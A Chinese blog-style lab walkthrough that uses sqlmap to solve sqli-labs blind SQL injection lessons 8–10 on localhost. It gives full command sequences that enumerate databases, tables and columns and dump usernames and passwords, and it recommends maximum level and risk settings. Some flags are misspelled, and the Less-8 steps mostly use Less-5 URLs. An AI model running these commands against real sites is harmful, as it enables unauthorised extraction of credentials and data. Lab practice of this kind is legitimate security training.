(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注

目录

 一、(sqlmap)SQL注入基本步骤:

二、扩展

2.1、命令扩展

2.2、注:

2.3、推荐:

三、Less8(GET - Blind - Boolian Based - Single Quotes)

 3.1、第一步:检测是否存在注入

基础操作

3.2、第二步:爆数据库名

命令

基础操作

3.3、第三步:爆数据库表名

命令 

基础操作

3.4、第四步:爆字段名

命令:

基础操作

3.5、第五步:爆数据

命令:

基础操作:

四、Less9(GET - Blind - Time Based - Single Quotes)

五、Less10(GET - Blind - Time Based - double Quotes)


 一、(sqlmap)SQL注入基本步骤:

第一步:注入点测试

第二步:爆数据库名

第三步:爆数据库表

第四步:爆字段

第五步:爆数据



二、扩展

2.1、命令扩展

(1)如果提前找到了数据库类型

--dbms +数据库

(2)扫描的等级

最高等级是

--leve=5 --risk=3


2.2、注:

我使用Windows中的sqlmap做,会带上python sqlmap.py

Linux:直接sqlmap +……


2.3、推荐:

(手工)【sqli-labs8-10】盲注:布尔盲注、时间盲注icon-default.png?t=M5H6https://blog.csdn.net/qq_53079406/article/details/125638629?spm=1001.2014.3001.5501



三、Less8(GET - Blind - Boolian Based - Single Quotes)

 3.1、第一步:检测是否存在注入

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch

--batch是使用默认设置

(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第1张图片

 

(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第2张图片

 

其实环境都扫出来了 

就可以再加上--dbms mysql了

3.2、第二步:爆数据库名

命令

#获取全部数据库

sqlmap.py -u url --dbs --batch

---------

#获取当前数据库

sqlmap.py -u url --current-dbs --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-8/?id=1' --dbs --batch

(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第3张图片

 

 (sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第4张图片

3.3、第三步:爆数据库表名

命令 

python sqlmap.py -u url -D DB --tables --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch

(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第5张图片

 

 (sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第6张图片

 

3.4、第四步:爆字段名

命令:

sqlmap.py -u url -D DB -T TBL --columns --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch

(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第7张图片

 

(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第8张图片

 

3.5、第五步:爆数据

命令:

sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch


基础操作:

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch

(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第9张图片

 

 (sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第10张图片

 



四、Less9(GET - Blind - Time Based - Single Quotes)

Less1-9关一样

都无需设置风险级别和测试级别



五、Less10(GET - Blind - Time Based - double Quotes)

需设置风险级别和测试级别了

--level=5 --risk=3(最高级别)

(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第11张图片

在每一步后面都加上风险级别和测试级别

就能跑出来了

(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注_第12张图片

 

你可能感兴趣的:(#,【全】sqlil-abs靶场,数据库,web安全)